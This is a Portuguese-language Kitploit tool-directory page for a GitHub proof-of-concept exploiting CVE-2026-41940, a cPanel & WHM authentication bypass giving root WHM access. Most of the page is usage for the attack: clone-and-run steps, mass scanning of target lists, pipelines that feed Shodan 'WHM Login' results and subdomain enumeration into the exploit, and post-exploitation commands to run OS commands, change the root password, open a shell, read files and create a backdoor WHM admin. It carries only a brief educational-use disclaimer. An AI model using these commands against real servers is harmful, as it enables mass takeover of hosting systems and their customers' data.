Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2026-41940-PoC — Explora o CVE-2026-41940, uma falha de bypass de autenticação no cPanel & WHM, para obter acesso root ao WHM e executar comandos de pós-exploração, leitura de arquivos e gerenciamento de contas. | Kitploit
Ferramentas/GitHubGitHub/hitechcloud-vietnam/cve-2026-41940-poc
Escalada de PrivilégiosReconhecimentoScanners de VulnerabilidadesExploraçãoExploração de Aplicações WebPós-ExploraçãoTestes de PenetraçãoComando e Controle

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Autenticação
Red Teaming
Ferramenta de Acesso Remoto
GitHubhitechcloud-vietnam/cve-2026-41940-poc

cve-2026-41940-PoC

Explora o CVE-2026-41940, uma falha de bypass de autenticação no cPanel & WHM, para obter acesso root ao WHM e executar comandos de pós-exploração, leitura de arquivos e gerenciamento de contas.

Ver Repositório
4há 11h 37mAinda não revisado

CVE-2026-41940

⚠ Esta ferramenta foi criada exclusivamente para fins educacionais ou de bug bounty. O uso não autorizado fora de ambientes controlados é estritamente proibido.

Descrição

Uma ferramenta para explorar a CVE-2026-41940, uma falha crítica de bypass de autenticação no cPanel & WHM (CVSS 10.0), permitindo que atacantes não autenticados obtenham acesso WHM com privilégios de root ao injetar sequências CRLF em arquivos de sessão do lado do servidor através do cabeçalho Authorization — sem necessidade de credenciais.

Como funciona

A CVE-2026-41940, em termos gerais, é explorada através de uma falha na forma como o sistema lida com sessões de autenticação no cPanel/WHM. O ataque normalmente começa com uma requisição normal à interface de login, onde a aplicação inicializa prematuramente uma sessão antes de validar completamente as credenciais do usuário. Devido ao tratamento inadequado de entradas relacionadas à sessão, certas estruturas de entrada criadas ou inesperadas podem alterar como os dados da sessão são armazenados ou interpretados pelo servidor.

Versões afetadas

VersãoVulnerávelCorrigida
110.x≤ 11.110.0.9611.110.0.97
118.x≤ 11.118.0.6211.118.0.63
126.x≤ 11.126.0.5311.126.0.54
132.x≤ 11.132.0.2811.132.0.29
134.x≤ 11.134.0.1911.134.0.20
136.x≤ 11.136.0.411.136.0.5

Instalação (Windows/Mac OS)🔄

root@kitploit:~
git clone https://github.com/hitechcloud-vietnam/CVE-2026-41940-PoC
cd CVE-2026-41940-PoC
# Windows 
python cve.py
# MacOS/Linux
python3 cve.py

Como usar

A ferramenta espera que um domínio alvo seja especificado.

Modo de alvo único:

root@kitploit:~
python cve.py -u https://target1.com:2083

Você também pode escanear a partir do arquivo target.txt (crie-o):

root@kitploit:~
python cve.py -l target.txt -t 50 -o result.json

Scan básico:

Comandos disponíveis:

root@kitploit:~
python cve.py -u https://victim1.com:2083 # scan de alvo único
python cve.py info -u https://victim1.com:2083 # Recupera informações do sistema (versão, carga, uso de disco).
python cve.py host -u https://victim1.com:2083 # Recupera o hostname do servidor alvo.

Ações pós-exploração

root@kitploit:~
# Lista todas as contas no servidor
python cve.py list -u https://target.com:2087

# Comando de SO
python cve.py cmd -u https://target.com:2087 --cmd "id;whoami;uname -a"
python cve.py cmd -u https://target.com:2087 --cmd "ls /home"

# Obtém informações do servidor (hostname, disco, host MySQL)
python cve.py info -u https://target.com:2087

# Altera a senha de root
python cve.py passwd -u https://target.com:2087 --passwd 'NewPassword1423!!@'

# Shell WHM interativo
python cve.py shell -u https://target.com:2087

Pipelines

root@kitploit:~
# subfinder → httpx → cPanelSniper
subfinder -d victim.com -silent | \
  httpx -silent -ports 2085,2086 -threads 50 | \
  python cve.py scan -t 40 -o results.json

# A partir de lista de escopo
cat scope.txt | \
  httpx -silent -ports 2085,2086 -threads 100 | \
  python cve.py scan -t 30 -o results.json

# Resultados do Shodan
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' | \
  python cve.py -t 30 -o shodan_results.json

# Múltiplas fontes combinadas
{ subfinder -d victim.com -silent; cat extra.txt; } | \
  httpx -silent -ports 2087 | \
  python cve.py -t 20 --action list

Modo Shell WHM

Após uma execução bem-sucedida, você pode abrir um shell WHM interativo:

root@kitploit:~
python cve.py shell -u

Todos os comandos do shell


Referência CLI

root@kitploit:~
usage: cve.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
                       [-t THREADS] [--timeout TIMEOUT] [--rate-limit N]
                       [--action ACTION] [--passwd PASS] [--cmd CMD]
                       [--new-user USER] [--new-domain DOMAIN]
                       [-o OUTPUT] 

Target:
  -u, --url URL          Single target URL (e.g. https://host:2087)
  -l, --list LIST        File with URLs (one per line)
  --hostname HOSTNAME    Override canonical Host header (auto-discovered)

Scan:
  -t, --threads N        Concurrent threads (default: 10)
  --timeout N            Request timeout seconds (default: 15)
  --rate-limit N         Delay between targets (default: 0)
  --force                Skip cPanel detection check

Post-Exploit:
  --action ACTION        Action: list | passwd | cmd | exec | info |
                                 version | shell | adduser
  --passwd PASS          New root password (--action passwd)
  --cmd CMD              OS command (--action cmd/exec)
  --new-user USER        New cPanel username (--action adduser)
  --new-domain DOMAIN    New cPanel domain (--action adduser)

Output:
  -o, --output FILE      Save results to JSON file
  --no-color             Disable ANSI colors

Aviso Legal

⚠ Esta ferramenta foi criada exclusivamente para fins educacionais ou de bug bounty. O uso não autorizado fora de ambientes controlados é estritamente proibido.

Baixar ferramenta
ComandoDescrição
idMostra o ID do usuário
hostnameObtém o hostname do servidor
accountsLista todas as contas de usuário
infoCarga, disco, host MySQL, versão
cat <path>Lê o conteúdo do arquivo
exec <cmd>Executa comando de SO
newadmin <user> <pass>Cria admin WHM backdoor
passwd <pass>Altera a senha de root
l [path]Lista diretório
helpMostra todos os comandos
exitSai do modo shell